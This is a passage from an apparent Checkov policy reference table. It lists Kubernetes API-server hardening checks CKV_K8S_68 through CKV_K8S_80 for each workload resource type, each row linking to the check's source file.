CKV_K8S_68 | resource | Job | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 
2896 | CKV_K8S_68 | resource | Pod | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2897 | CKV_K8S_68 | resource | PodTemplate | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2898 | CKV_K8S_68 | resource | ReplicaSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2899 | CKV_K8S_68 | resource | ReplicationController | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2900 | CKV_K8S_68 | resource | StatefulSet | Ensure that the --anonymous-auth argument is set to false | Kubernetes | [ApiServerAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAnonymousAuth.py) | -| 2901 | CKV_K8S_69 | resource | CronJob | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2902 | CKV_K8S_69 | resource | DaemonSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2903 | CKV_K8S_69 | resource | Deployment | Ensure that the --basic-auth-file argument is not set | Kubernetes | 
[ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2904 | CKV_K8S_69 | resource | DeploymentConfig | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2905 | CKV_K8S_69 | resource | Job | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2906 | CKV_K8S_69 | resource | Pod | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2907 | CKV_K8S_69 | resource | PodTemplate | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2908 | CKV_K8S_69 | resource | ReplicaSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2909 | CKV_K8S_69 | resource | ReplicationController | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2910 | CKV_K8S_69 | resource | StatefulSet | Ensure that the --basic-auth-file argument is not set | Kubernetes | [ApiServerBasicAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py) | -| 2911 | 
CKV_K8S_70 | resource | CronJob | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2912 | CKV_K8S_70 | resource | DaemonSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2913 | CKV_K8S_70 | resource | Deployment | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2914 | CKV_K8S_70 | resource | DeploymentConfig | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2915 | CKV_K8S_70 | resource | Job | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2916 | CKV_K8S_70 | resource | Pod | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2917 | CKV_K8S_70 | resource | PodTemplate | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2918 | CKV_K8S_70 | resource | ReplicaSet | Ensure that the --token-auth-file argument is not set | Kubernetes | 
[ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2919 | CKV_K8S_70 | resource | ReplicationController | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2920 | CKV_K8S_70 | resource | StatefulSet | Ensure that the --token-auth-file argument is not set | Kubernetes | [ApiServerTokenAuthFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTokenAuthFile.py) | -| 2921 | CKV_K8S_71 | resource | CronJob | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2922 | CKV_K8S_71 | resource | DaemonSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2923 | CKV_K8S_71 | resource | Deployment | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2924 | CKV_K8S_71 | resource | DeploymentConfig | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2925 | CKV_K8S_71 | resource | Job | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2926 | 
CKV_K8S_71 | resource | Pod | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2927 | CKV_K8S_71 | resource | PodTemplate | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2928 | CKV_K8S_71 | resource | ReplicaSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2929 | CKV_K8S_71 | resource | ReplicationController | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2930 | CKV_K8S_71 | resource | StatefulSet | Ensure that the --kubelet-https argument is set to true | Kubernetes | [ApiServerKubeletHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletHttps.py) | -| 2931 | CKV_K8S_72 | resource | CronJob | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2932 | CKV_K8S_72 | resource | DaemonSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2933 | CKV_K8S_72 | resource | 
Deployment | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2934 | CKV_K8S_72 | resource | DeploymentConfig | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2935 | CKV_K8S_72 | resource | Job | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2936 | CKV_K8S_72 | resource | Pod | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2937 | CKV_K8S_72 | resource | PodTemplate | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2938 | CKV_K8S_72 | resource | ReplicaSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2939 | CKV_K8S_72 | resource | 
ReplicationController | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2940 | CKV_K8S_72 | resource | StatefulSet | Ensure that the --kubelet-client-certificate and --kubelet-client-key arguments are set as appropriate | Kubernetes | [ApiServerKubeletClientCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerKubeletClientCertAndKey.py) | -| 2941 | CKV_K8S_73 | resource | CronJob | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2942 | CKV_K8S_73 | resource | DaemonSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2943 | CKV_K8S_73 | resource | Deployment | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2944 | CKV_K8S_73 | resource | DeploymentConfig | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2945 | CKV_K8S_73 | resource | Job | Ensure that the --kubelet-certificate-authority argument 
is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2946 | CKV_K8S_73 | resource | Pod | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2947 | CKV_K8S_73 | resource | PodTemplate | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2948 | CKV_K8S_73 | resource | ReplicaSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2949 | CKV_K8S_73 | resource | ReplicationController | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2950 | CKV_K8S_73 | resource | StatefulSet | Ensure that the --kubelet-certificate-authority argument is set as appropriate | Kubernetes | [ApiServerkubeletCertificateAuthority.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerkubeletCertificateAuthority.py) | -| 2951 | CKV_K8S_74 | resource | CronJob | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2952 | CKV_K8S_74 | resource | DaemonSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2953 | CKV_K8S_74 | resource | Deployment | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2954 | CKV_K8S_74 | resource | DeploymentConfig | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2955 | CKV_K8S_74 | resource | Job | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2956 | CKV_K8S_74 | resource | Pod | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2957 | CKV_K8S_74 | resource | PodTemplate | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | 
[ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2958 | CKV_K8S_74 | resource | ReplicaSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2959 | CKV_K8S_74 | resource | ReplicationController | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2960 | CKV_K8S_74 | resource | StatefulSet | Ensure that the --authorization-mode argument is not set to AlwaysAllow | Kubernetes | [ApiServerAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py) | -| 2961 | CKV_K8S_75 | resource | CronJob | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2962 | CKV_K8S_75 | resource | DaemonSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2963 | CKV_K8S_75 | resource | Deployment | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2964 | 
CKV_K8S_75 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2965 | CKV_K8S_75 | resource | Job | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2966 | CKV_K8S_75 | resource | Pod | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2967 | CKV_K8S_75 | resource | PodTemplate | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2968 | CKV_K8S_75 | resource | ReplicaSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2969 | CKV_K8S_75 | resource | ReplicationController | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2970 | CKV_K8S_75 | resource | StatefulSet | Ensure that the --authorization-mode argument includes Node | Kubernetes | [ApiServerAuthorizationModeNode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py) | -| 2971 | 
CKV_K8S_77 | resource | CronJob | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2972 | CKV_K8S_77 | resource | DaemonSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2973 | CKV_K8S_77 | resource | Deployment | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2974 | CKV_K8S_77 | resource | DeploymentConfig | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2975 | CKV_K8S_77 | resource | Job | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2976 | CKV_K8S_77 | resource | Pod | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2977 | CKV_K8S_77 | resource | PodTemplate | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2978 | CKV_K8S_77 | resource 
| ReplicaSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2979 | CKV_K8S_77 | resource | ReplicationController | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2980 | CKV_K8S_77 | resource | StatefulSet | Ensure that the --authorization-mode argument includes RBAC | Kubernetes | [ApiServerAuthorizationModeRBAC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py) | -| 2981 | CKV_K8S_78 | resource | AdmissionConfiguration | Ensure that the admission control plugin EventRateLimit is set | Kubernetes | [ApiServerAdmissionControlEventRateLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlEventRateLimit.py) | -| 2982 | CKV_K8S_79 | resource | CronJob | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2983 | CKV_K8S_79 | resource | DaemonSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2984 | CKV_K8S_79 | resource | Deployment | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | 
[ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2985 | CKV_K8S_79 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2986 | CKV_K8S_79 | resource | Job | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2987 | CKV_K8S_79 | resource | Pod | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2988 | CKV_K8S_79 | resource | PodTemplate | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2989 | CKV_K8S_79 | resource | ReplicaSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2990 | CKV_K8S_79 | resource | ReplicationController | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2991 | CKV_K8S_79 
| resource | StatefulSet | Ensure that the admission control plugin AlwaysAdmit is not set | Kubernetes | [ApiServerAdmissionControlAlwaysAdmit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAdmissionControlAlwaysAdmit.py) | -| 2992 | CKV_K8S_80 | resource | CronJob | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 2993 | CKV_K8S_80 | resource | DaemonSet | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 2994 | CKV_K8S_80 | resource | Deployment | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 2995 | CKV_K8S_80 | resource | DeploymentConfig | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 2996 | CKV_K8S_80 | resource | Job | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | [ApiServerAlwaysPullImagesPlugin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAlwaysPullImagesPlugin.py) | -| 2997 | CKV_K8S_80 | resource | Pod | Ensure that the admission control plugin AlwaysPullImages is set | Kubernetes | 
